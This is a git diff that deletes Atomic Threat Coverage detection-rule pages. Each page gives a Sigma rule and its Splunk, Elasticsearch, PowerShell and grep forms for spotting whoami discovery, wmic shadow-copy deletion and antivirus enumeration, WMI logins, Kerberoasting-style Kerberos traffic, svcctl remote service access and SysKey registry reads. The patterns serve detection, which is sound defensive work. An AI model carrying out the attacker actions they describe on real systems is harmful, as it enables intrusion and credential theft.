--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_whoami.md
+++ /dev/null
@@ -1,178 +0,0 @@
-| Title                    | Whoami Execution       |
-|:-------------------------|:------------------|
-| **Description**          | Detects the execution of whoami, which is often used by attackers after exloitation / privilege escalation but rarely used by administrators |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0007: Discovery](https://attack.mitre.org/tactics/TA0007)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1033: System Owner/User Discovery](https://attack.mitre.org/techniques/T1033)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1033: System Owner/User Discovery](../Triggers/T1033.md)</li></ul>  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Admin activity</li><li>Scripts and administrative tools used in the monitored environment</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/](https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/)</li><li>[https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/](https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/)</li></ul>  |
-| **Author**               | Florian Roth |
-| Other Tags           | <ul><li>car.2016-03-001</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Whoami Execution
-id: e28a5a99-da44-436d-b7a0-2afc20a5f413
-status: experimental
-description: Detects the execution of whoami, which is often used by attackers after exloitation / privilege escalation but rarely used by administrators
-references:
-    - https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/
-    - https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/
-author: Florian Roth
-date: 2018/08/13
-tags:
-    - attack.discovery
-    - attack.t1033
-    - car.2016-03-001
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        Image: '*\whoami.exe'
-    selection2:
-        OriginalFileName: 'whoami.exe'
-    condition: selection or selection2
-falsepositives:
-    - Admin activity
-    - Scripts and administrative tools used in the monitored environment
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {(($_.ID -eq "1") -and ($_.message -match "Image.*.*\\whoami.exe" -or $_.message -match "OriginalFileName.*whoami.exe")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.Image.keyword:*\\whoami.exe OR OriginalFileName:"whoami.exe")
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/e28a5a99-da44-436d-b7a0-2afc20a5f413 <<EOF
-{
-  "metadata": {
-    "title": "Whoami Execution",
-    "description": "Detects the execution of whoami, which is often used by attackers after exloitation / privilege escalation but rarely used by administrators",
-    "tags": [
-      "attack.discovery",
-      "attack.t1033",
-      "car.2016-03-001"
-    ],
-    "query": "(winlog.event_data.Image.keyword:*\\\\whoami.exe OR OriginalFileName:\"whoami.exe\")"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.Image.keyword:*\\\\whoami.exe OR OriginalFileName:\"whoami.exe\")",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Whoami Execution'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(Image.keyword:*\\whoami.exe OR OriginalFileName:"whoami.exe")
-```
-
-
-### splunk
-    
-```
-(Image="*\\whoami.exe" OR OriginalFileName="whoami.exe")
-```
-
-
-### logpoint
-    
-```
-(event_id="1" (Image="*\\whoami.exe" OR OriginalFileName="whoami.exe"))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?:.*.*\whoami\.exe|.*whoami\.exe))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_wmi_execution.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_wmi_execution.md
deleted file mode 100644
index d93dc91..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_wmi_execution.md
+++ /dev/null
@@ -1,186 +0,0 @@
-| Title                    | Suspicious WMI Execution       |
-|:-------------------------|:------------------|
-| **Description**          | Detects WMI executing suspicious commands |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1047: Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1047: Windows Management Instrumentation](../Triggers/T1047.md)</li></ul>  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>Will need to be tuned</li><li>If using Splunk, I recommend | stats count by Computer,CommandLine following for easy hunting by Computer/CommandLine.</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://digital-forensics.sans.org/blog/2010/06/04/wmic-draft/](https://digital-forensics.sans.org/blog/2010/06/04/wmic-draft/)</li><li>[https://www.hybrid-analysis.com/sample/4be06ecd234e2110bd615649fe4a6fa95403979acf889d7e45a78985eb50acf9?environmentId=1](https://www.hybrid-analysis.com/sample/4be06ecd234e2110bd615649fe4a6fa95403979acf889d7e45a78985eb50acf9?environmentId=1)</li><li>[https://blog.malwarebytes.com/threat-analysis/2016/04/rokku-ransomware/](https://blog.malwarebytes.com/threat-analysis/2016/04/rokku-ransomware/)</li></ul>  |
-| **Author**               | Michael Haag, Florian Roth, juju4 |
-| Other Tags           | <ul><li>car.2016-03-002</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Suspicious WMI Execution
-id: 526be59f-a573-4eea-b5f7-f0973207634d
-status: experimental
-description: Detects WMI executing suspicious commands
-references:
-    - https://digital-forensics.sans.org/blog/2010/06/04/wmic-draft/
-    - https://www.hybrid-analysis.com/sample/4be06ecd234e2110bd615649fe4a6fa95403979acf889d7e45a78985eb50acf9?environmentId=1
-    - https://blog.malwarebytes.com/threat-analysis/2016/04/rokku-ransomware/
-author: Michael Haag, Florian Roth, juju4
-date: 2019/01/16
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        Image:
-            - '*\wmic.exe'
-        CommandLine:
-            - '*/NODE:*process call create *'
-            - '* path AntiVirusProduct get *'
-            - '* path FirewallProduct get *'
-            - '* shadowcopy delete *'
-    condition: selection
-fields:
-    - CommandLine
-    - ParentCommandLine
-tags:
-    - attack.execution
-    - attack.t1047
-    - car.2016-03-002
-falsepositives:
-    - Will need to be tuned
-    - If using Splunk, I recommend | stats count by Computer,CommandLine following for easy hunting by Computer/CommandLine.
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "Image.*.*\\wmic.exe") -and ($_.message -match "CommandLine.*.*/NODE:.*process call create .*" -or $_.message -match "CommandLine.*.* path AntiVirusProduct get .*" -or $_.message -match "CommandLine.*.* path FirewallProduct get .*" -or $_.message -match "CommandLine.*.* shadowcopy delete .*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.Image.keyword:(*\\wmic.exe) AND winlog.event_data.CommandLine.keyword:(*\/NODE\:*process\ call\ create\ * OR *\ path\ AntiVirusProduct\ get\ * OR *\ path\ FirewallProduct\ get\ * OR *\ shadowcopy\ delete\ *))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/526be59f-a573-4eea-b5f7-f0973207634d <<EOF
-{
-  "metadata": {
-    "title": "Suspicious WMI Execution",
-    "description": "Detects WMI executing suspicious commands",
-    "tags": [
-      "attack.execution",
-      "attack.t1047",
-      "car.2016-03-002"
-    ],
-    "query": "(winlog.event_data.Image.keyword:(*\\\\wmic.exe) AND winlog.event_data.CommandLine.keyword:(*\\/NODE\\:*process\\ call\\ create\\ * OR *\\ path\\ AntiVirusProduct\\ get\\ * OR *\\ path\\ FirewallProduct\\ get\\ * OR *\\ shadowcopy\\ delete\\ *))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.Image.keyword:(*\\\\wmic.exe) AND winlog.event_data.CommandLine.keyword:(*\\/NODE\\:*process\\ call\\ create\\ * OR *\\ path\\ AntiVirusProduct\\ get\\ * OR *\\ path\\ FirewallProduct\\ get\\ * OR *\\ shadowcopy\\ delete\\ *))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Suspicious WMI Execution'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n      CommandLine = {{_source.CommandLine}}\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(Image.keyword:(*\\wmic.exe) AND CommandLine.keyword:(*\/NODE\:*process call create * * path AntiVirusProduct get * * path FirewallProduct get * * shadowcopy delete *))
-```
-
-
-### splunk
-    
-```
-((Image="*\\wmic.exe") (CommandLine="*/NODE:*process call create *" OR CommandLine="* path AntiVirusProduct get *" OR CommandLine="* path FirewallProduct get *" OR CommandLine="* shadowcopy delete *")) | table CommandLine,ParentCommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" Image IN ["*\\wmic.exe"] CommandLine IN ["*/NODE:*process call create *", "* path AntiVirusProduct get *", "* path FirewallProduct get *", "* shadowcopy delete *"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*.*\wmic\.exe))(?=.*(?:.*.*/NODE:.*process call create .*|.*.* path AntiVirusProduct get .*|.*.* path FirewallProduct get .*|.*.* shadowcopy delete .*)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_wmi_login.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_wmi_login.md
deleted file mode 100644
index dd71e9e..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_wmi_login.md
+++ /dev/null
@@ -1,172 +0,0 @@
-| Title                    | Login with WMI       |
-|:-------------------------|:------------------|
-| **Description**          | Detection of logins performed with WMI |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1047: Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              | <ul><li>[T1047: Windows Management Instrumentation](../Triggers/T1047.md)</li></ul>  |
-| **Severity Level**       | low |
-| **False Positives**      | <ul><li>Monitoring tools</li><li>Legitimate system administration</li></ul>  |
-| **Development Status**   | stable |
-| **References**           |  There are no documented References for this Detection Rule yet  |
-| **Author**               | Thomas Patzke |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Login with WMI
-id: 5af54681-df95-4c26-854f-2565e13cfab0
-status: stable
-description: Detection of logins performed with WMI
-author: Thomas Patzke
-date: 2019/12/04
-tags:
-    - attack.execution
-    - attack.t1047
-logsource:
-    product: windows
-    service: security
-detection:
-    selection:
-        EventID: 4624
-        ProcessName: "*\\WmiPrvSE.exe"
-    condition: selection
-falsepositives:
-    - Monitoring tools
-    - Legitimate system administration
-level: low
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Security | where {($_.ID -eq "4624" -and $_.message -match "ProcessName.*.*\\WmiPrvSE.exe") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Security" AND winlog.event_id:"4624" AND winlog.event_data.ProcessName.keyword:*\\WmiPrvSE.exe)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/5af54681-df95-4c26-854f-2565e13cfab0 <<EOF
-{
-  "metadata": {
-    "title": "Login with WMI",
-    "description": "Detection of logins performed with WMI",
-    "tags": [
-      "attack.execution",
-      "attack.t1047"
-    ],
-    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4624\" AND winlog.event_data.ProcessName.keyword:*\\\\WmiPrvSE.exe)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4624\" AND winlog.event_data.ProcessName.keyword:*\\\\WmiPrvSE.exe)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Login with WMI'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:"4624" AND ProcessName.keyword:*\\WmiPrvSE.exe)
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Security" EventCode="4624" ProcessName="*\\WmiPrvSE.exe")
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" event_id="4624" ProcessName="*\\WmiPrvSE.exe")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*4624)(?=.*.*\WmiPrvSE\.exe))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_suspicious_outbound_kerberos_connection.md b/Atomic_Threat_Coverage/Detection_Rules/win_suspicious_outbound_kerberos_connection.md
deleted file mode 100644
index 9b4e883..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_suspicious_outbound_kerberos_connection.md
+++ /dev/null
@@ -1,182 +0,0 @@
-| Title                    | Suspicious Outbound Kerberos Connection       |
-|:-------------------------|:------------------|
-| **Description**          | Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation. |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0008: Lateral Movement](https://attack.mitre.org/tactics/TA0008)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1208: Kerberoasting](https://attack.mitre.org/techniques/T1208)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Other browsers</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://github.com/GhostPack/Rubeus8](https://github.com/GhostPack/Rubeus8)</li></ul>  |
-| **Author**               | Ilyas Ochkov, oscd.community |
-| Other Tags           | <ul><li>attack.t1558.003</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Suspicious Outbound Kerberos Connection
-id: eca91c7c-9214-47b9-b4c5-cb1d7e4f2350
-status: experimental
-description: Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.
-references:
-    - https://github.com/GhostPack/Rubeus8
-author: Ilyas Ochkov, oscd.community
-date: 2019/10/24
-modified: 2019/11/13
-tags:
-    - attack.lateral_movement
-    - attack.t1208
-    - attack.t1558.003
-logsource:
-    product: windows
-    service: security
-detection:
-    selection:
-        EventID: 5156
-        DestinationPort: 88
-    filter:
-        Image|endswith:
-            - '\lsass.exe'
-            - '\opera.exe'
-            - '\chrome.exe'
-            - '\firefox.exe'
-    condition: selection and not filter
-falsepositives:
-    - Other browsers
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Security | where {(($_.ID -eq "5156" -and $_.message -match "DestinationPort.*88") -and  -not (($_.message -match "Image.*.*\\lsass.exe" -or $_.message -match "Image.*.*\\opera.exe" -or $_.message -match "Image.*.*\\chrome.exe" -or $_.message -match "Image.*.*\\firefox.exe"))) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Security" AND (winlog.event_id:"5156" AND winlog.event_data.DestinationPort:"88") AND (NOT (winlog.event_data.Image.keyword:(*\\lsass.exe OR *\\opera.exe OR *\\chrome.exe OR *\\firefox.exe))))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/eca91c7c-9214-47b9-b4c5-cb1d7e4f2350 <<EOF
-{
-  "metadata": {
-    "title": "Suspicious Outbound Kerberos Connection",
-    "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.",
-    "tags": [
-      "attack.lateral_movement",
-      "attack.t1208",
-      "attack.t1558.003"
-    ],
-    "query": "(winlog.channel:\"Security\" AND (winlog.event_id:\"5156\" AND winlog.event_data.DestinationPort:\"88\") AND (NOT (winlog.event_data.Image.keyword:(*\\\\lsass.exe OR *\\\\opera.exe OR *\\\\chrome.exe OR *\\\\firefox.exe))))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Security\" AND (winlog.event_id:\"5156\" AND winlog.event_data.DestinationPort:\"88\") AND (NOT (winlog.event_data.Image.keyword:(*\\\\lsass.exe OR *\\\\opera.exe OR *\\\\chrome.exe OR *\\\\firefox.exe))))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Suspicious Outbound Kerberos Connection'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((EventID:"5156" AND DestinationPort:"88") AND (NOT (Image.keyword:(*\\lsass.exe *\\opera.exe *\\chrome.exe *\\firefox.exe))))
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Security" (EventCode="5156" DestinationPort="88") NOT ((Image="*\\lsass.exe" OR Image="*\\opera.exe" OR Image="*\\chrome.exe" OR Image="*\\firefox.exe")))
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" (event_id="5156" DestinationPort="88")  -(Image IN ["*\\lsass.exe", "*\\opera.exe", "*\\chrome.exe", "*\\firefox.exe"]))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*(?=.*5156)(?=.*88)))(?=.*(?!.*(?:.*(?=.*(?:.*.*\lsass\.exe|.*.*\opera\.exe|.*.*\chrome\.exe|.*.*\firefox\.exe))))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_svcctl_remote_service.md b/Atomic_Threat_Coverage/Detection_Rules/win_svcctl_remote_service.md
deleted file mode 100644
index f7ff32c..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_svcctl_remote_service.md
+++ /dev/null
@@ -1,175 +0,0 @@
-| Title                    | Remote Service Activity via SVCCTL Named Pipe       |
-|:-------------------------|:------------------|
-| **Description**          | Detects remote remote service activity via remote access to the svcctl named pipe |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0008: Lateral Movement](https://attack.mitre.org/tactics/TA0008)</li><li>[TA0003: Persistence](https://attack.mitre.org/tactics/TA0003)</li></ul>  |
-| **ATT&amp;CK Technique** |  This Detection Rule wasn't mapped to ATT&amp;CK Technique yet  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>pentesting</li></ul>  |
-| **Development Status**   |  Development Status wasn't defined for this Detection Rule yet  |
-| **References**           | <ul><li>[https://blog.menasec.net/2019/03/threat-hunting-26-remote-windows.html](https://blog.menasec.net/2019/03/threat-hunting-26-remote-windows.html)</li></ul>  |
-| **Author**               | Samir Bousseaden |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Remote Service Activity via SVCCTL Named Pipe
-id: 586a8d6b-6bfe-4ad9-9d78-888cd2fe50c3
-description: Detects remote remote service activity via remote access to the svcctl named pipe
-author: Samir Bousseaden
-date: 2019/04/03
-references:
-    - https://blog.menasec.net/2019/03/threat-hunting-26-remote-windows.html
-tags:
-    - attack.lateral_movement
-    - attack.persistence
-logsource:
-    product: windows
-    service: security
-    description: 'The advanced audit policy setting "Object Access > Audit Detailed File Share" must be configured for Success/Failure'
-detection:
-    selection:
-        EventID: 5145
-        ShareName: \\*\IPC$
-        RelativeTargetName: svcctl
-        Accesses: '*WriteData*'
-    condition: selection
-falsepositives:
-    - pentesting
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Security | where {($_.ID -eq "5145" -and $_.message -match "ShareName.*\\.*\\IPC$" -and $_.message -match "RelativeTargetName.*svcctl" -and $_.message -match "Accesses.*.*WriteData.*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Security" AND winlog.event_id:"5145" AND winlog.event_data.ShareName.keyword:\\*\\IPC$ AND RelativeTargetName:"svcctl" AND Accesses.keyword:*WriteData*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/586a8d6b-6bfe-4ad9-9d78-888cd2fe50c3 <<EOF
-{
-  "metadata": {
-    "title": "Remote Service Activity via SVCCTL Named Pipe",
-    "description": "Detects remote remote service activity via remote access to the svcctl named pipe",
-    "tags": [
-      "attack.lateral_movement",
-      "attack.persistence"
-    ],
-    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"5145\" AND winlog.event_data.ShareName.keyword:\\\\*\\\\IPC$ AND RelativeTargetName:\"svcctl\" AND Accesses.keyword:*WriteData*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"5145\" AND winlog.event_data.ShareName.keyword:\\\\*\\\\IPC$ AND RelativeTargetName:\"svcctl\" AND Accesses.keyword:*WriteData*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Remote Service Activity via SVCCTL Named Pipe'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:"5145" AND ShareName.keyword:\\*\\IPC$ AND RelativeTargetName:"svcctl" AND Accesses.keyword:*WriteData*)
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Security" EventCode="5145" ShareName="\\*\\IPC$" RelativeTargetName="svcctl" Accesses="*WriteData*")
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" event_id="5145" ShareName="\\*\\IPC$" RelativeTargetName="svcctl" Accesses="*WriteData*")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*5145)(?=.*\\.*\IPC\$)(?=.*svcctl)(?=.*.*WriteData.*))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_syskey_registry_access.md b/Atomic_Threat_Coverage/Detection_Rules/win_syskey_registry_access.md
deleted file mode 100644
index 28b6365..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_syskey_registry_access.md
+++ /dev/null
@@ -1,180 +0,0 @@
-| Title                    | SysKey Registry Keys Access       |
-|:-------------------------|:------------------|
-| **Description**          | Detects handle requests and access operations to specific registry keys to calculate the SysKey |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0007: Discovery](https://attack.mitre.org/tactics/TA0007)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1012: Query Registry](https://attack.mitre.org/techniques/T1012)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              | <ul><li>[T1012: Query Registry](../Triggers/T1012.md)</li></ul>  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://github.com/hunters-forge/ThreatHunter-Playbook/blob/master/playbooks/windows/07_discovery/T1012_query_registry/syskey_registry_keys_access.md](https://github.com/hunters-forge/ThreatHunter-Playbook/blob/master/playbooks/windows/07_discovery/T1012_query_registry/syskey_registry_keys_access.md)</li></ul>  |
-| **Author**               | Roberto Rodriguez @Cyb3rWard0g |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: SysKey Registry Keys Access
-id: 9a4ff3b8-6187-4fd2-8e8b-e0eae1129495
-description: Detects handle requests and access operations to specific registry keys to calculate the SysKey
-status: experimental
-date: 2019/08/12
-modified: 2019/11/10
-author: Roberto Rodriguez @Cyb3rWard0g
-references:
-    - https://github.com/hunters-forge/ThreatHunter-Playbook/blob/master/playbooks/windows/07_discovery/T1012_query_registry/syskey_registry_keys_access.md
-tags:
-    - attack.discovery
-    - attack.t1012
-logsource:
-    product: windows
-    service: security
-detection:
-    selection:
-        EventID:
-            - 4656
-            - 4663
-        ObjectType: 'key'
-        ObjectName|endswith:
-            - 'lsa\JD'
-            - 'lsa\GBG'
-            - 'lsa\Skew1'
-            - 'lsa\Data'
-    condition: selection
-falsepositives:
-    - Unknown
-level: critical
-```
-
-
-
-
-
-### powershell
-    
-```
